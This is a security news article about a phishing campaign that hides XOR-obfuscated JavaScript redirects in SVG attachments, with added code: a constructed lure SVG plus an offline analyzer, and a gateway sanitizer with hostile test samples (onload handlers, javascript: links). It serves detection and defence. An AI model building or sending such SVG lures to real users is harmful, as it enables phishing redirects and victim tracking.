Threat Actors Exploit SVG Files in Stealthy JavaScript Redirects

July 15, 2025

A new phishing campaign leveraging SVG files to deliver JavaScript-based redirect attacks has been uncovered by cybersecurity researchers.

The attack utilizes seemingly benign image files to conceal obfuscated script logic that redirects users to malicious domains without requiring the download of files or user interaction.

According to a new advisory published by Ontinue today, unlike traditional phishing methods that drop executables or use macro-laden documents, this campaign embeds JavaScript in a <script> element inside the SVG file itself.

Once the SVG is opened directly in a browser, the embedded script decodes a secondary payload using a static XOR key and then redirects the user to an attacker-controlled site by assigning to window.location.href. The redirect URLs often carry Base64-encoded strings used for victim tracking. Note that the script only runs when the file is loaded as a document (for example, by launching the attachment); an SVG referenced from an <img> tag is rendered without script execution, which is why the lure depends on the victim opening the file.
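To make the mechanism concrete, the following is an added example (not Ontinue's code, and not the campaign's real sample): a constructed SVG that mirrors the described technique, plus an offline analyzer that recovers the redirect target without ever executing the script. The key value, the domain example.invalid, the tracker value and every function name here are assumptions for illustration.

```javascript
// Added example (not Ontinue's code or the campaign's actual sample): a
// constructed SVG that mirrors the described technique, and an offline
// analyzer that recovers the redirect target without executing the script.
// Everything here (key, domain, tracker value) is made up for illustration.

const XOR_KEY = 0x5a; // assumed static single-byte key for the sample

// XOR-encode a UTF-8 string into a byte array (used only to build the sample).
function xorEncode(text, key) {
  return Array.from(Buffer.from(text, 'utf8'), (b) => b ^ key);
}

// Constructed redirect target carrying a Base64 "victim tracker" in the query.
const TRACKER = Buffer.from('victim@example.com', 'utf8').toString('base64');
const TARGET = `https://example.invalid/login?id=${TRACKER}`;

// The constructed lure: a 1x1 image whose <script> decodes the URL with the
// static key and assigns window.location.href, as the advisory describes.
const SAMPLE_SVG = `<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">
  <rect width="1" height="1" fill="#fff"/>
  <script><![CDATA[
    var k = ${XOR_KEY};
    var d = [${xorEncode(TARGET, XOR_KEY).join(',')}];
    var s = '';
    for (var i = 0; i < d.length; i++) { s += String.fromCharCode(d[i] ^ k); }
    window.location.href = s;
  ]]></script>
</svg>`;

// Pull every <script> body out of an SVG, dropping a CDATA wrapper if present.
// Regex is adequate for triage; use a real XML parser where it must be exact.
function extractScripts(svg) {
  const scripts = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(svg)) !== null) {
    scripts.push(m[1].replace(/^\s*<!\[CDATA\[/, '').replace(/\]\]>\s*$/, ''));
  }
  return scripts;
}

// Cheap static indicators: a location change, a long numeric array, an XOR.
function triageScript(js) {
  return {
    setsLocation: /window\.location(?:\.href)?\s*=|location\.(?:replace|assign)\s*\(/.test(js),
    hasByteArray: /\[\s*\d+(?:\s*,\s*\d+){7,}\s*\]/.test(js),
    hasXor: /\^\s*(?:[A-Za-z_$][\w$]*|\d+)/.test(js),
  };
}

// Recover the redirect target from the byte array. Try the first numeric
// `var x = N;` as the key, then fall back to all 256 single-byte keys and
// accept the first decode that looks like a URL.
function decodeRedirect(js) {
  const arr = js.match(/\[\s*(\d+(?:\s*,\s*\d+)+)\s*\]/);
  if (!arr) return null;
  const bytes = arr[1].split(',').map((x) => parseInt(x.trim(), 10));
  const keyHint = js.match(/var\s+\w+\s*=\s*(\d+)\s*;/);
  const keys = keyHint ? [Number(keyHint[1])] : [];
  for (let k = 0; k < 256; k++) if (!keys.includes(k)) keys.push(k);
  for (const key of keys) {
    const text = Buffer.from(bytes.map((b) => b ^ key)).toString('utf8');
    if (/^https?:\/\//.test(text)) return { key, url: text };
  }
  return null;
}

// Decode a Base64 tracking value from the query string. Read the raw query so
// '+' and '=' from the Base64 alphabet are not mangled by URLSearchParams.
function extractTracker(url) {
  const query = new URL(url).search.slice(1);
  for (const part of query.split('&')) {
    const eq = part.indexOf('=');
    const value = eq < 0 ? part : part.slice(eq + 1);
    if (value.length >= 8 && value.length % 4 === 0 && /^[A-Za-z0-9+/]+={0,2}$/.test(value)) {
      return Buffer.from(value, 'base64').toString('utf8');
    }
  }
  return null;
}

// One report per <script> element in the file.
function analyzeSvg(svg) {
  return extractScripts(svg).map((js) => {
    const redirect = decodeRedirect(js);
    return {
      triage: triageScript(js),
      redirect,
      tracker: redirect ? extractTracker(redirect.url) : null,
    };
  });
}

console.log(JSON.stringify(analyzeSvg(SAMPLE_SVG), null, 2));
```

Run it with Node; the report shows the recovered key, the decoded redirect URL and the decoded tracking value. Because a single-byte XOR is a bijection, only the true key yields a string beginning with http, so the brute-force fallback is safe to use when the key is not declared as a simple variable.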

The emails distributing these SVGs are sent using spoofed addresses or domains that mimic legitimate brands. Many of the recipient domains lacked proper email authentication controls, including:

  • No DKIM records

  • Missing or unenforced DMARC policies

  • Misconfigured SPF settings

“This is a fresh spin on the technique of using image files for delivering suspect content, in this case, malicious PDFs,” said John Bambenek, president at Bambenek Consulting.

“The attackers have to rely on complacency (‘it's only an image, it doesn’t execute code’) to lull organizations into accepting this content and getting it on the inside of a network.”

Evasion and Infrastructure Tactics

The attackers have integrated geofencing into their landing pages and use short-lived, randomized domains to stay ahead of static detection techniques. The payload is often hosted externally or attached directly to the email, with minimal content in the message body to avoid suspicion.


Unlike previous SVG-based threats that relied on hosted payloads or third-party file sharing, this campaign runs entirely within the client’s browser. By avoiding executable drops and leveraging trusted web functions, it bypasses many endpoint detection tools.

“Defenders must collapse the old distinction between code and content,” warned Jason Soroko, senior fellow at Sectigo.

“Treat every inbound SVG as a potential executable. Strip or block script tags. Enforce strict DMARC alignment and auto-purge questionable mail. Instrument telemetry to catch browser pivots triggered by window location changes that originate from image previews.”
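One way to act on the "strip or block" advice at a mail or upload gateway, as an added example that is neither Ontinue's nor Sectigo's code: a conservative sanitizer that removes the script vectors relevant here (<script> elements, on* event handlers, javascript: links, and <foreignObject>, which can smuggle HTML into an SVG) and tallies what it removed so the gateway can quarantine rather than silently clean. The sample SVG and the function names are constructed for this example. It is regex-based for brevity, so treat it as triage logic and re-parse the output with a strict XML parser, or block SVG attachments outright, where the decision matters.

```javascript
// Added example, not Ontinue's or Sectigo's code: a conservative SVG sanitizer
// for a mail or upload gateway. Strips <script>, <foreignObject>, on* event
// handlers and javascript:/vbscript: links, and reports what it removed.
// Sample input is constructed. Regex is used for brevity; production code
// should re-parse the result with a strict XML parser or block SVG outright.

const SCRIPT_ELEMENT_RE = /<script\b[^>]*>[\s\S]*?<\/script\s*>|<script\b[^>]*\/>/gi;
const FOREIGN_OBJECT_RE = /<foreignObject\b[\s\S]*?<\/foreignObject\s*>/gi;
const EVENT_HANDLER_RE = /\s+on[a-z]+\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+)/gi;
const SCRIPT_URI_RE = /\s+(?:xlink:)?href\s*=\s*(["'])\s*(?:javascript|vbscript)\s*:[^"']*\1/gi;

// Count matches of a global regex without relying on its lastIndex state.
function countMatches(re, s) {
  return (s.match(re) || []).length;
}

// Returns the stripped SVG, a tally per vector, and a clean flag that is true
// only when nothing had to be removed.
function sanitizeSvg(svg) {
  const removed = { scripts: 0, foreignObjects: 0, handlers: 0, scriptUris: 0 };
  let out = svg;
  removed.scripts = countMatches(SCRIPT_ELEMENT_RE, out);
  out = out.replace(SCRIPT_ELEMENT_RE, '');
  removed.foreignObjects = countMatches(FOREIGN_OBJECT_RE, out);
  out = out.replace(FOREIGN_OBJECT_RE, '');
  removed.handlers = countMatches(EVENT_HANDLER_RE, out);
  out = out.replace(EVENT_HANDLER_RE, '');
  removed.scriptUris = countMatches(SCRIPT_URI_RE, out);
  out = out.replace(SCRIPT_URI_RE, '');
  const clean = Object.values(removed).every((n) => n === 0);
  return { svg: out, removed, clean };
}

// Gateway policy: "strip" delivers the cleaned file, "block" (the default)
// quarantines anything that needed cleaning. The tally goes to telemetry
// either way, which is what lets hunt teams see the campaign at all.
function gatewayDecision(svg, mode = 'block') {
  const result = sanitizeSvg(svg);
  if (result.clean) return { action: 'deliver', ...result };
  if (mode === 'strip') return { action: 'deliver-stripped', ...result };
  return { action: 'quarantine', ...result };
}

// Constructed sample that packs several vectors into one lure.
const DIRTY_SVG = '<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">'
  + '<script>window.location.href=\'https://example.invalid/\'</script>'
  + '<a xlink:href="javascript:alert(1)"><rect width="1" height="1"/></a>'
  + '<foreignObject><body xmlns="http://www.w3.org/1999/xhtml"><script>1</script></body></foreignObject>'
  + '</svg>';

// Constructed benign sample that must pass through untouched.
const CLEAN_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><circle r="1"/></svg>';

console.log(JSON.stringify(gatewayDecision(DIRTY_SVG, 'strip'), null, 2));
```

The sanitizer deliberately leaves data: URIs alone, since <image href="data:image/png;base64,..."> is a legitimate and common SVG construct; if your policy treats data: links in <a> elements as hostile, add them to SCRIPT_URI_RE. Order matters slightly: scripts are removed before <foreignObject> so that the tally counts a script hidden inside the foreign HTML.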

Campaign Targets and Recommendations

The phishing campaign appears to focus on B2B service providers with access to sensitive financial and employee data.

This includes:

  • SaaS platforms

  • Utility companies

  • Financial services vendors

“While this report and research is valuable to enterprises, and the search valuable for hunt teams, organizations without a security staff or end consumers will remain vulnerable to conventional cybercrime with this technique,” Bambenek added.

To mitigate the threat, Ontinue recommends enabling Safe Links and Safe Attachments (Microsoft Defender for Office 365), enforcing DMARC, blocking SVG attachments at the mail gateway and educating users about risky attachments.
